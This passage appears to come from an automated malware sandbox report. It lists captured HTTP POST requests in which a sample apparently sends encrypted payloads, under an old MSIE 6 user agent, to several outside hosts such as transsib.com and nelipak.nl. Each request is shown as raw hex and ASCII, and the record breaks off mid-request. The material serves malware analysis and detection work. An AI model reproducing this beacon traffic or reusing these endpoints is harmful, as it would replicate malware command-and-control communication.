+m9Vlm85AP723xBzjhgr1Xj1YZOF0tPrE6BkyVhai3M9ckUwGe4h9dCVbYS8u0FNFWIl5EhOffjpcsJWDiigiLC8PYHBowIsc1LA+y74PeGVMNWuvvayHZSBGd7Br6tNNwu5PRBTS1QMNKN7PJ2MFXU48umWLb11SJQWzcBqxe8OIrHe9AcQ9jDckS8tO2qUd0r/F5CmdF635dqwwHUgw4uzN+E47/8dmjPUZXI0wGPfTrd3BaLwkW0dD3sNnzdF8BM+fLjRr+r6GO00B6PV+dZ4IA71vXGNORG72aSiJNqICwfXEhme2S9bEIVezXflNhDrnztRjO7xQdkfCJgB29046ezESpQqM9Bm7/fkj39K28oiGV2QYQW+xdfqw6RLHf1V5k4p4yqB4m5S7loUr6ui3S/YLkM2o6l/QEDTD42TTt20aDXRzOEB4cMrjjxLiWHPjS7dDQ6t3UsVZmSTO8RSjB/fgUzWvhvVbLImwPtmKiKs6tw2YvQIXN8JR+QDh631m0XpK0rPz4W3wECOS9aEwZ3uRa8Wbq52ukjMOa9bAuKrcQfPHXHN
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 4d 70 51 67 6c 42 63 6e 41 50 34 63 70 73 4e 6f 42 68 6c 44 41 32 41 35 66 71 46 4e 39 66 6d 48 4f 35 77 30 39 54 30 70 72 65 39 71 32 73 7a 68 6a 68 34 67 53 57 44 37 6d 51 72 44 53 33 33 70 75 55 36 59 52 70 64 43 55 37 36 77 2f 35 33 39 45 58 30 6c 45 4e 6c 51 6a 64 62 4a 58 74 37 73 75 30 50 64 52 2f 4b 6f 4b 4e 62 48 48 55 65 36 4a 74 53 5a 47 67 46 64 31 42 51 39 4d 4d 4c 6f 55 2f 4f 48 73 52 70 59 2b 75 66 4d 39 49 39 51 77 6d 51 37 42 5a 41 37 45 5a 4b 48 4a 2b 63 53 74 43 52 34 78 42 47 36 58 54 6a 76 4e 58 32 36 79 63 7a 2b 6f 58 30 76 34 77 64 74 72 6e 66 75 6e 42 49 32 35 2f 34 72 34 62 68 68 56 79 45 43 33 32 2b 78 69 39 33 57 52 32 54 76 4d 36 2f 75 51 73 74 67 77 53 35 7a 6f 64 37 53 32 53 37 4f 6c 69 43 64 76 34 32 56 44 39 73 54 59 38 77 2b 64 65 74 70 77 6f 69 62 67 41 79 63 43 6e 41 4b 72 75 5a 70 61 46 57 69 2f 68 6e 66 79 57 41 50 52 7a 6f 7a 35 30 53 48 5a 68 4c 30 45 55 38 76 6f 4f 32 36 6c 73 73 6b 53 59 7a 2b 56 57 75 65 6d 7a 48 70 64 76 79 45 6e 41 51 45 4c 69 42 4b 38 4d 64 4c 77 76 59 32 48 2b 6b 59 4c 35 54 75 2f 36 46 53 74 59 68 37 44 33 51 4f 77 4f 68 73 5a 69 39 73 55 54 49 5a 77 52 2f 56 4d 39 65 66 2f 6e 33 42 6b 4c 46 56 58 36 55 4c 31 6b 64 46 6f 68 5a 73 72 79 4f 73 64 32 39 45 57 6d 43 71 6d 75 53 62 71 73 65 52 2f 69 74 47 78 47 54 68 4b 59 48 7a 71 45 52 51 6b 44 58 6f 36 4c 50 57 4f 72 78 42 53 65 55 39 76 64 43 69 41 66 33 65 70 79 41 4e 6a 64 75 42 67 76 4e 77 4a 4e 4b 5a 61 51 6a 6a 33 42 34 6e 4f 6d 62 34 74 7a 30 6c 65 59 49 68 61 48 69 52 66 4e 68 72 6d 31 5a 6e 76 38 4d 6d 46 6f 37 68 7a 45 7a 58 68 4f 68 54 71 57 62 4b 33 31 75 74 71 43 63 45 6c 4d 38 56 4b 73 67 70 6e 67 4f 48 74 59 6e 67 70 41 78 53 45 4f 67 76 53 2f 41 3d Data Ascii: MpQglBcnAP4cpsNoBhlDA2A5fqFN9fmHO5w09T0pre9q2szhjh4gSWD7mQrDS33puU6YRpdCU76w/539EX0lENlQjdbJXt7su0PdR/KoKNbHHUe6JtSZGgFd1BQ9MMLoU/OHsRpY+ufM9I9QwmQ7BZA7EZKHJ+cStCR4xBG6XTjvNX26ycz+oX0v4wdtrnfunBI25/4r4bhhVyEC32+xi93WR2TvM6/uQstgwS5zod7S2S7OliCdv42VD9sTY8w+detpwoibgAycCnAKruZpaFWi/hnfyWAPRzoz50SHZhL0EU8voO26lsskSYz+VWuemzHpdvyEnAQELiBK8MdLwvY2H+kYL5Tu/6FStYh7D3QOwOhsZi9sUTIZwR/VM9ef/n3BkLFVX6UL1kdFohZsryOsd29EWmCqmuSbqseR/itGxGThKYHzqERQkDXo6LPWOrxBSeU9vdCiAf3epyANjduBgvNwJNKZaQjj3B4nOmb4tz0leYIhaHiRfNhrm1Znv8MmFo7hzEzXhOhTqWbK31utqCcElM8VKsgpngOHtYngpAxSEOgvS/A=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nelipak.nlCache-Control: no-cacheData Raw: 2b 6d 39 56 6c 6d 38 35 41 50 37 32 33 78 42 7a 6a 68 67 72 31 58 6a 31 59 5a 4f 46 30 74 50 72 45 36 42 6b 79 56 68 61 69 33 4d 39 63 6b 55 77 47 65 34 68 39 64 43 56 62 59 53 38 75 30 46 4e 46 57 49 6c 35 45 68 4f 66 66 6a 70 63 73 4a 57 44 69 69 67 69 4c 43 38 50 59 48 42 6f 77 49 73 63 31 4c 41 2b 79 37 34 50 65 47 56 4d 4e 57 75 76 76 61 79 48 5a 53 42 47 64 37 42 72 36 74 4e 4e 77 75 35 50 52 42 54 53 31 51 4d 4e 4b 4e 37 50 4a 32 4d 46 58 55 34 38 75 6d 57 4c 62 31 31 53 4a 51 57 7a 63 42 71 78 65 38 4f 49 72 48 65 39 41 63 51 39 6a 44 63 6b 53 38 74 4f 32 71 55 64 30 72 2f 46 35 43 6d 64 46 36 33 35 64 71 77 77 48 55 67 77 34 75 7a 4e 2b 45 34 37 2f 38 64 6d 6a 50 55 5a 58 49 30 77 47 50 66 54 72 64 33 42 61 4c 77 6b 57 30 64 44 33 73 4e 6e 7a 64 46 38 42 4d 2b 66 4c 6a 52 72 2b 72 36 47 4f 30 30 42 36 50 56 2b 64 5a 34 49 41 37 31 76 58 47 4e 4f 52 47 37 32 61 53 69 4a 4e 71 49 43 77 66 58 45 68 6d 65 32 53 39 62 45 49 56 65 7a 58 66 6c 4e 68 44 72 6e 7a 74 52 6a 4f 37 78 51 64 6b 66 43 4a 67 42 32 39 30 34 36 65 7a 45 53 70 51 71 4d 39 42 6d 37 2f 66 6b 6a 33 39 4b 32 38 6f 69 47 56 32 51 59 51 57 2b 78 64 66 71 77 36 52 4c 48 66 31 56 35 6b 34 70 34 79 71 42 34 6d 35 53 37 6c 6f 55 72 36 75 69 33 53 2f 59 4c 6b 4d 32 6f 36 6c 2f 51 45 44 54 44 34 32 54 54 74 32 30 61 44 58 52 7a 4f 45 42 34 63 4d 72 6a 6a 78 4c 69 57 48 50 6a 53 37 64 44 51 36 74 33 55 73 56 5a 6d 53 54 4f 38 52 53 6a 42 2f 66 67 55 7a 57 76 68 76 56 62 4c 49 6d 77 50 74 6d 4b 69 4b 73 36 74 77 32 59 76 51 49 58 4e 38 4a 52 2b 51 44 68 36 33 31 6d 30 58 70 4b 30 72 50 7a 34 57 33 77 45 43 4f 53 39 61 45 77 5a 33 75 52 61 38 57 62 71 35 32 75 6b 6a 4d 4f 61 39 62 41 75 4b 72 63 51 66 50 48 58 48 4e Data Ascii: +m9Vlm85AP723xBzjhgr1Xj1YZOF0tPrE6BkyVhai3M9ckUwGe4h9dCVbYS8u0FNFWIl5EhOffjpcsJWDiigiLC8PYHBowIsc1LA+y74PeGVMNWuvvayHZSBGd7Br6tNNwu5PRBTS1QMNKN7PJ2MFXU48umWLb11SJQWzcBqxe8OIrHe9AcQ9jDckS8tO2qUd0r/F5CmdF635dqwwHUgw4uzN+E47/8dmjPUZXI0wGPfTrd3BaLwkW0dD3sNnzdF8BM+fLjRr+r6GO00B6PV+dZ4IA71vXGNORG72aSiJNqICwfXEhme2S9bEIVezXflNhDrnztRjO7xQdkfCJgB29046ezESpQqM9Bm7/fkj39K28oiGV2QYQW+xdfqw6RLHf1V5k4p4yqB4m5S7loUr6ui3S/YLkM2o6l/QEDTD42TTt20aDXRzOEB4cMrjjxLiWHPjS7dDQ6t3UsVZmSTO8RSjB/fgUzWvhvVbLImwPtmKiKs6tw2YvQIXN8JR+QDh631m0XpK0rPz4W3wECOS9aEwZ3uRa8Wbq52ukjMOa9bAuKrcQfPHXHN
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 55 47 42 64 6c 72 45 35 41 50 35 59 49 57 74 4c 30 47 65 33 32 77 72 5a 36 59 2f 76 48 4b 67 63 64 52 50 52 4f 71 6d 63 59 78 66 6a 48 68 59 55 50 65 50 68 70 76 44 31 46 76 35 61 63 6d 39 4b 6f 2b 4c 74 2f 72 66 64 72 68 66 42 47 78 4f 39 30 4d 72 66 55 46 5a 52 44 6d 30 54 4e 39 35 72 67 74 54 54 75 4d 4c 4e 6f 64 4d 5a 45 55 71 77 62 61 6d 2b 62 45 30 6c 59 79 35 43 62 65 51 39 75 31 4f 77 37 65 65 64 49 2b 5a 73 6f 38 65 34 65 6f 70 39 34 62 55 53 6a 58 4e 4c 62 6a 32 74 69 75 6f 48 34 64 6b 39 70 43 49 67 6b 45 47 48 4d 72 30 2f 59 39 72 56 6b 4a 4b 53 54 37 4b 31 2f 73 6b 65 37 38 61 63 74 6d 4e 6f 31 56 6a 6d 69 38 5a 37 36 30 51 64 31 32 34 4f 6c 64 69 64 50 72 44 68 33 75 62 79 52 42 61 4e 71 68 45 70 50 6a 31 4a 68 7a 61 6f 64 41 70 79 47 4d 2b 4f 57 68 41 50 35 51 2b 73 43 67 4f 6e 77 53 4d 41 61 77 62 6f 47 6c 46 4a 6e 52 7a 50 4f 53 44 66 6e 77 64 34 37 30 66 52 6f 2b 43 7a 6f 77 63 58 53 39 66 39 73 49 5a 4f 67 6f 67 43 6c 6e 38 47 73 45 32 32 70 79 71 2b 44 47 47 31 4a 58 2b 52 4e 44 64 56 4c 55 6f 45 76 4b 66 70 6b 44 51 4e 42 79 6f 56 51 70 31 77 42 43 77 37 7a 35 45 38 48 41 6d 38 39 2f 43 66 56 61 74 50 7a 79 38 69 6d 44 6d 4a 36 77 50 57 57 67 56 6d 54 49 79 4a 2f 48 33 38 73 77 76 32 63 72 67 55 63 4f 4d 62 76 6b 6a 64 78 4c 63 48 4b 65 6c 7a 6d 59 4a 41 54 36 76 67 72 30 39 50 34 63 7a 31 2b 4e 41 43 66 41 31 56 31 51 48 54 42 64 34 79 75 56 74 2f 34 6b 4d 78 4a 4b 36 5a 2f 52 61 35 63 4f 4e 69 6f 45 58 2f 6f 77 53 57 7a 64 45 68 30 4d 62 69 77 38 30 54 66 35 35 49 70 63 32 4c 45 62 72 36 70 58 73 77 41 44 44 46 6c 43 50 71 65 78 30 78 50 2f 77 61 4b 49 55 6f 34 65 39 6c 44 63 43 46 73 55 77 37 7a 74 4d 65 49 48 4a 46 50 36 54 63 59 30 51 42 78 6d 4d 52 61 55 71 30 57 32 4d 3d Data Ascii: UGBdlrE5AP5YIWtL0Ge32wrZ6Y/vHKgcdRPROqmcYxfjHhYUPePhpvD1Fv5acm9Ko+Lt/rfdrhfBGxO90MrfUFZRDm0TN95rgtTTuMLNodMZEUqwbam+bE0lYy5CbeQ9u1Ow7eedI+Zso8e4eop94bUSjXNLbj2tiuoH4dk9pCIgkEGHMr0/Y9rVkJKST7K1/ske78actmNo1Vjmi8Z760Qd124OldidPrDh3ubyRBaNqhEpPj1JhzaodApyGM+OWhAP5Q+sCgOnwSMAawboGlFJnRzPOSDfnwd470fRo+CzowcXS9f9sIZOgogCln8GsE22pyq+DGG1JX+RNDdVLUoEvKfpkDQNByoVQp1wBCw7z5E8HAm89/CfVatPzy8imDmJ6wPWWgVmTIyJ/H38swv2crgUcOMbvkjdxLcHKelzmYJAT6vgr09P4cz1+NACfA1V1QHTBd4yuVt/4kMxJK6Z/Ra5cONioEX/owSWzdEh0Mbiw80Tf55Ipc2LEbr6pXswADDFlCPqex0xP/waKIUo4e9lDcCFsUw7ztMeIHJFP6TcY0QBxmMRaUq0W2M=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.com-sit.comCache-Control: no-cacheData Raw: 4b 41 49 33 50 4c 6a 73 44 66 34 43 64 52 42 4d 4f 30 68 74 7a 61 75 4d 30 30 38 41 68 70 36 44 62 4d 74 75 66 42 5a 61 4c 37 4b 6f 70 55 72 6a 30 56 52 50 6d 52 48 54 61 34 32 6a 4b 33 74 55 53 44 49 70 53 33 44 63 57 77 5a 4e 30 4d 46 59 49 35 34 77 6f 49 78 6a 4e 62 67 63 45 49 2b 34 47 31 50 63 56 69 78 67 65 56 75 76 30 31 66 41 37 33 79 73 62 4a 54 66 6c 33 33 49 2f 53 59 55 6c 70 30 34 49 38 65 44 4c 70 32 61 4d 78 73 6c 49 4a 70 69 33 62 76 53 31 79 56 78 4b 33 59 6f 33 6c 32 5a 37 75 62 5a 4e 6b 52 67 70 47 61 6a 69 58 7a 53 54 6e 6a 31 48 78 57 50 4b 59 46 53 67 41 6c 33 38 36 54 6f 47 6e 4f 51 45 65 4b 65 6e 70 32 57 58 48 66 7a 6b 78 46 39 2f 6a 33 37 33 2b 49 51 2b 44 71 4c 4d 6d 53 76 2f 56 65 2b 45 49 71 51 50 2f 73 58 43 78 62 69 6e 2f 75 30 39 69 69 52 4f 48 34 71 6a 30 73 59 52 49 75 50 38 53 6d 38 58 57 46 57 62 57 73 73 53 70 37 50 43 6a 67 44 78 43 55 73 57 46 4f 53 66 71 65 68 56 79 4b 30 71 50 32 50 73 62 61 76 62 4b 46 52 5a 67 75 6e 34 34 32 37 2b 42 66 73 71 4a 61 37 5a 61 75 30 46 66 56 4c 53 46 43 48 58 66 47 68 56 72 35 56 35 38 39 79 68 48 34 76 4b 46 68 79 77 79 66 73 36 33 33 35 76 58 58 59 4c 51 32 6e 48 44 4b 31 74 4c 46 6a 6a 52 66 68 33 69 4a 4c 64 55 38 6c 45 6a 68 53 4c 6f 74 65 50 6f 4c 54 2b 51 54 67 66 33 37 39 6f 35 57 61 6a 67 46 33 54 62 33 4b 2b 44 67 50 31 58 78 59 6f 77 58 4f 52 68 74 5a 37 72 77 73 4d 76 59 75 32 73 39 63 73 35 39 2b 43 44 49 69 36 4e 45 42 50 75 59 35 73 46 34 57 64 45 38 68 30 79 70 32 58 58 4d 2b 49 53 69 6e 70 6b 37 4b 31 4d 43 6a 36 2f 33 2f 34 78 56 4a 6d 73 62 47 68 46 67 4a 51 4b 70 54 77 64 58 56 4c 76 33 72 6e 5a 61 48 68 50 33 55 41 57 58 6c 45 39 36 6b 6c 76 46 6f 35 52 35 45 51 37 31 4a 4e 65 59 69 74 68 42 4c 56 72 36 71 34 4f 6b 6e 58 2f 30 52 4a 6d 62 5a 33 76 47 2b 44 51 3d 3d Data Ascii: KAI3PLjsDf4CdRBMO0htzauM008Ahp6DbMtufBZaL7KopUrj0VRPmRHTa42jK3tUSDIpS3DcWwZN0MFYI54woIxjNbgcEI+4G1PcVixgeVuv01fA73ysbJTfl33I/SYUlp04I8eDLp2aMxslIJpi3bvS1yVxK3Yo3l2Z7ubZNkRgpGajiXzSTnj1HxWPKYFSgAl386ToGnOQEeKenp2WXHfzkxF9/j373+IQ+DqLMmSv/Ve+EIqQP/sXCxbin/u09iiROH4qj0sYRIuP8Sm8XWFWbWssSp7PCjgDxCUsWFOSfqehVyK0qP2PsbavbKFRZgun4427+BfsqJa7Zau0FfVLSFCHXfGhVr5V589yhH4vKFhywyfs6335vXXYLQ2nHDK1tLFjjRfh3iJLdU8lEjhSLotePoLT+QTgf379o5WajgF3Tb3K+DgP1XxYowXORhtZ7rwsMvYu2s9cs59+CDIi6NEBPuY5sF4WdE8h0yp2XXM+ISinpk7K1MCj6/3/4xVJmsbGhFgJQKpTwdXVLv3rnZaHhP3UAWXlE96klvFo5R5EQ71JNeYithBLVr6q4OknX/0RJmbZ3vG+DQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 74 50 36 6c 6c 31 31 45 41 50 34 32 73 6b 2b 33 6c 48 72 45 36 70 61 30 5a 6c 30 4c 43 79 57 38 34 56 4c 45 57 2f 4a 56 33 2b 54 41 79 41 70 77 74 4c 58 74 54 62 42 4e 36 5a 79 6f 33 72 6e 6e 54 61 67 32 30 77 53 70 77 49 2f 6e 61 34 2f 64 47 46 5a 6e 65 30 42 73 6e 4d 74 53 56 6d 35 35 32 51 53 46 47 2f 63 67 61 31 2b 43 75 7a 72 4b 49 64 55 71 42 6b 64 63 38 57 73 4c 46 73 4d 75 56 47 7a 67 68 74 55 48 52 64 38 45 51 41 4b 57 79 5a 56 59 53 59 37 4c 6a 67 6e 75 76 54 37 63 46 58 44 52 4c 59 4e 4c 35 39 51 50 74 39 70 46 68 50 47 6b 44 4d 58 52 44 4f 50 48 52 56 6d 58 6c 6c 35 68 57 72 64 66 2f 74 45 76 72 6e 66 59 4e 65 57 4d 68 56 69 4a 63 6a 5a 4b 34 77 53 34 6c 7a 63 76 36 6f 51 78 39 76 35 41 79 7a 51 67 44 30 67 67 37 6d 79 61 65 51 5a 34 52 42 71 55 49 33 64 71 68 70 6c 69 49 65 74 32 73 32 65 2f 62 71 62 72 71 33 67 32 73 7a 62 4c 6a 4c 74 4b 43 68 79 6e 73 49 4e 69 78 33 53 4a 4f 77 58 78 58 4c 58 68 41 6c 7a 57 5a 67 55 46 53 35 73 63 46 72 6f 46 4a 36 43 39 2b 67 51 70 46 32 58 53 32 53 67 2b 36 69 46 77 39 77 5a 42 7a 32 4b 72 69 4e 37 44 35 53 50 2b 4e 30 33 70 62 58 6d 62 46 59 78 45 64 55 39 76 55 7a 45 76 32 5a 2b 57 58 31 64 4e 58 66 6e 4c 5a 49 70 34 64 55 61 59 52 6a 30 77 63 69 45 61 6e 69 55 52 70 68 34 72 44 74 4f 57 64 50 59 54 48 77 72 54 75 6b 71 59 46 6e 64 53 6a 56 73 2b 6f 46 39 71 6e 4a 63 69 48 66 41 4a 4e 74 31 78 34 79 30 6a 4e 2b 79 6e 6e 74 36 63 4b 71 66 64 32 79 48 39 62 43 6d 4e 58 46 74 49 4f 67 78 57 30 6d 56 69 32 48 2f 62 42 56 43 4d 69 74 61 47 78 61 76 57 49 75 6c 47 4f 7a 47 41 67 37 63 45 42 71 73 36 41 53 78 4d 36 37 47 7a 45 74 75 43 6d 77 56 66 42 2f 63 3d Data Ascii: tP6ll11EAP42sk+3lHrE6pa0Zl0LCyW84VLEW/JV3+TAyApwtLXtTbBN6Zyo3rnnTag20wSpwI/na4/dGFZne0BsnMtSVm552QSFG/cga1+CuzrKIdUqBkdc8WsLFsMuVGzghtUHRd8EQAKWyZVYSY7LjgnuvT7cFXDRLYNL59QPt9pFhPGkDMXRDOPHRVmXll5hWrdf/tEvrnfYNeWMhViJcjZK4wS4lzcv6oQx9v5AyzQgD0gg7myaeQZ4RBqUI3dqhpliIet2s2e/bqbrq3g2szbLjLtKChynsINix3SJOwXxXLXhAlzWZgUFS5scFroFJ6C9+gQpF2XS2Sg+6iFw9wZBz2KriN7D5SP+N03pbXmbFYxEdU9vUzEv2Z+WX1dNXfnLZIp4dUaYRj0wciEaniURph4rDtOWdPYTHwrTukqYFndSjVs+oF9qnJciHfAJNt1x4y0jN+ynnt6cKqfd2yH9bCmNXFtIOgxW0mVi2H/bBVCMitaGxavWIulGOzGAg7cEBqs6ASxM67GzEtuCmwVfB/c=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 79 78 4c 6d 6d 4d 46 4f 41 50 36 48 57 43 31 4b 6f 4e 6d 73 38 70 71 41 43 61 4d 2f 50 78 63 50 68 62 46 76 30 70 43 4d 4c 43 39 6b 37 67 37 59 47 2f 33 59 6a 38 35 45 31 30 73 35 45 4e 69 63 6e 58 6e 4d 2f 72 7a 6c 2f 34 70 70 54 53 68 70 42 64 33 6b 78 6c 6c 41 45 79 65 6c 64 53 54 4a 35 45 49 53 36 65 4f 48 30 65 6a 74 46 58 70 34 54 70 35 6c 35 53 6c 63 54 67 57 34 67 55 77 4d 6e 53 2f 55 61 65 6d 50 33 47 51 32 65 45 50 54 72 6b 34 45 6c 70 53 6c 2f 36 7a 47 67 47 53 74 68 65 36 42 32 54 37 46 4d 63 4b 6a 4b 4a 4c 70 6b 4a 50 73 66 71 4a 77 6a 6b 53 4e 38 36 62 66 63 79 38 6c 65 54 76 55 68 34 67 6c 73 59 51 66 76 5a 38 46 4e 66 38 74 38 67 55 52 45 2f 61 61 67 71 71 36 6c 52 77 37 45 6f 58 34 6b 79 48 51 53 78 5a 44 47 63 69 46 53 44 39 4f 71 6c 62 5a 34 33 4a 4b 6d 65 76 65 54 73 64 52 34 30 39 68 50 50 47 6a 6d 55 58 42 77 6b 46 76 33 34 73 6c 44 71 44 68 4e 50 53 50 75 34 30 63 4a 32 6a 4f 55 59 4a 52 56 76 4e 48 61 4a 45 45 35 7a 48 74 36 35 4a 4e 42 49 6d 6b 66 64 64 36 31 53 61 71 4b 53 39 59 6a 53 36 59 73 4b 6f 70 6d 52 4c 7a 48 2b 44 77 31 4a 56 57 4d 6f 37 75 6a 39 45 32 55 64 48 4e 38 4d 42 30 6d 69 4c 47 47 6e 37 4a 31 31 55 48 4a 37 67 36 43 44 32 6b 59 44 4b 54 63 6b 48 58 33 6c 64 43 55 79 31 44 42 45 47 65 49 4b 78 6d 33 74 58 43 79 73 36 46 39 6b 4c 4c 56 57 2f 54 6a 62 63 41 67 4f 69 62 35 5a 56 44 62 61 46 4f 6a 62 5a 41 4a 47 4a 76 70 5a 57 6b 54 6a 64 36 58 6a 74 70 6f 4d 75 36 31 4e 30 44 79 38 6e 51 37 4d 50 48 67 64 2f 51 50 49 56 52 35 63 62 37 6f 32 31 4a 4d 48 61 2b 55 4b 55 34 74 4c 55 6a 45 63 4d 68 64 35 6e 37 79 57 37 43 4b 4e 45 54 4e 50 38 78 50 70 41 6b Data Ascii: yxLmmMFOAP6HWC1KoNms8pqACaM/PxcPhbFv0pCMLC9k7g7YG/3Yj85E10s5ENicnXnM/rzl/4ppTShpBd3kxllAEyeldSTJ5EIS6eOH0ejtFXp4Tp5l5SlcTgW4gUwMnS/UaemP3GQ2eEPTrk4ElpSl/6zGgGSthe6B2T7FMcKjKJLpkJPsfqJwjkSN86bfcy8leTvUh4glsYQfvZ8FNf8t8gURE/aagqq6lRw7EoX4kyHQSxZDGciFSD9OqlbZ43JKmeveTsdR409hPPGjmUXBwkFv34slDqDhNPSPu40cJ2jOUYJRVvNHaJEE5zHt65JNBImkfdd61SaqKS9YjS6YsKopmRLzH+Dw1JVWMo7uj9E2UdHN8MB0miLGGn7J11UHJ7g6CD2kYDKTckHX3ldCUy1DBEGeIKxm3tXCys6F9kLLVW/TjbcAgOib5ZVDbaFOjbZAJGJvpZWkTjd6XjtpoMu61N0Dy8nQ7MPHgd/QPIVR5cb7o21JMHa+UKU4tLUjEcMhd5n7yW7CKNETNP8xPpAk
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 55 47 42 64 6c 72 45 35 41 50 35 59 49 57 74 4c 30 47 65 33 32 77 72 5a 36 59 2f 76 48 4b 67 63 64 52 50 52 4f 71 6d 63 59 78 66 6a 48 68 59 55 50 65 50 68 70 76 44 31 46 76 35 61 63 6d 39 4b 6f 2b 4c 74 2f 72 66 64 72 68 66 42 47 78 4f 39 30 4d 72 66 55 46 5a 52 44 6d 30 54 4e 39 35 72 67 74 54 54 75 4d 4c 4e 6f 64 4d 5a 45 55 71 77 62 61 6d 2b 62 45 30 6c 59 79 35 43 62 65 51 39 75 31 4f 77 37 65 65 64 49 2b 5a 73 6f 38 65 34 65 6f 70 39 34 62 55 53 6a 58 4e 4c 62 6a 32 74 69 75 6f 48 34 64 6b 39 70 43 49 67 6b 45 47 48 4d 72 30 2f 59 39 72 56 6b 4a 4b 53 54 37 4b 31 2f 73 6b 65 37 38 61 63 74 6d 4e 6f 31 56 6a 6d 69 38 5a 37 36 30 51 64 31 32 34 4f 6c 64 69 64 50 72 44 68 33 75 62 79 52 42 61 4e 71 68 45 70 50 6a 31 4a 68 7a 61 6f 64 41 70 79 47 4d 2b 4f 57 68 41 50 35 51 2b 73 43 67 4f 6e 77 53 4d 41 61 77 62 6f 47 6c 46 4a 6e 52 7a 50 4f 53 44 66 6e 77 64 34 37 30 66 52 6f 2b 43 7a 6f 77 63 58 53 39 66 39 73 49 5a 4f 67 6f 67 43 6c 6e 38 47 73 45 32 32 70 79 71 2b 44 47 47 31 4a 58 2b 52 4e 44 64 56 4c 55 6f 45 76 4b 66 70 6b 44 51 4e 42 79 6f 56 51 70 31 77 42 43 77 37 7a 35 45 38 48 41 6d 38 39 2f 43 66 56 61 74 50 7a 79 38 69 6d 44 6d 4a 36 77 50 57 57 67 56 6d 54 49 79 4a 2f 48 33 38 73 77 76 32 63 72 67 55 63 4f 4d 62 76 6b 6a 64 78 4c 63 48 4b 65 6c 7a 6d 59 4a 41 54 36 76 67 72 30 39 50 34 63 7a 31 2b 4e 41 43 66 41 31 56 31 51 48 54 42 64 34 79 75 56 74 2f 34 6b 4d 78 4a 4b 36 5a 2f 52 61 35 63 4f 4e 69 6f 45 58 2f 6f 77 53 57 7a 64 45 68 30 4d 62 69 77 38 30 54 66 35 35 49 70 63 32 4c 45 62 72 36 70 58 73 77 41 44 44 46 6c 43 50 71 65 78 30 78 50 2f 77 61 4b 49 55 6f 34 65 39 6c 44 63 43 46 73 55 77 37 7a 74 4d 65 49 48 4a 46 50 36 54 63 59 30 51 42 78 6d 4d 52 61 55 71 30 57 32 4d 3d Data Ascii: UGBdlrE5AP5YIWtL0Ge32wrZ6Y/vHKgcdRPROqmcYxfjHhYUPePhpvD1Fv5acm9Ko+Lt/rfdrhfBGxO90MrfUFZRDm0TN95rgtTTuMLNodMZEUqwbam+bE0lYy5CbeQ9u1Ow7eedI+Zso8e4eop94bUSjXNLbj2tiuoH4dk9pCIgkEGHMr0/Y9rVkJKST7K1/ske78actmNo1Vjmi8Z760Qd124OldidPrDh3ubyRBaNqhEpPj1JhzaodApyGM+OWhAP5Q+sCgOnwSMAawboGlFJnRzPOSDfnwd470fRo+CzowcXS9f9sIZOgogCln8GsE22pyq+DGG1JX+RNDdVLUoEvKfpkDQNByoVQp1wBCw7z5E8HAm89/CfVatPzy8imDmJ6wPWWgVmTIyJ/H38swv2crgUcOMbvkjdxLcHKelzmYJAT6vgr09P4cz1+NACfA1V1QHTBd4yuVt/4kMxJK6Z/Ra5cONioEX/owSWzdEh0Mbiw80Tf55Ipc2LEbr6pXswADDFlCPqex0xP/waKIUo4e9lDcCFsUw7ztMeIHJFP6TcY0QBxmMRaUq0W2M=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 45 43 31 31 39 4f 65 49 4a 50 35 31 4c 34 6b 63 6c 76 46 6b 45 62 43 50 4b 65 4a 64 77 30 67 64 43 2b 74 69 61 64 50 77 73 49 59 66 6b 35 30 79 62 57 58 73 74 54 4c 68 46 77 51 47 46 52 71 54 54 50 6c 56 45 72 4d 34 51 73 61 79 5a 53 76 64 55 48 6a 42 71 70 2f 30 73 49 68 73 32 66 44 2f 73 42 2f 78 53 36 4a 50 45 38 57 59 77 34 70 37 35 6e 55 72 70 54 34 46 76 4b 6e 66 68 69 70 56 35 4d 44 52 63 61 49 65 39 66 4d 52 36 37 2f 47 37 52 50 77 53 50 4f 70 31 50 46 36 50 50 6b 75 31 4b 57 4d 41 4f 41 2b 35 61 52 34 4e 63 6b 47 70 65 58 46 6c 39 79 52 4e 36 43 51 67 51 63 70 33 37 67 49 4d 55 42 52 4b 34 6b 76 53 64 65 33 47 58 63 74 6f 4c 54 76 69 6e 6d 44 4e 49 58 2b 58 4f 2b 6c 43 61 31 6d 31 44 48 6a 6b 79 65 51 7a 37 76 45 6a 6e 53 71 77 44 38 46 71 77 54 5a 74 2f 33 67 32 4d 79 39 43 42 2f 6d 78 64 52 6b 34 75 48 4f 63 58 61 43 62 41 48 7a 2b 6f 44 67 47 2b 45 68 49 51 45 5a 36 75 75 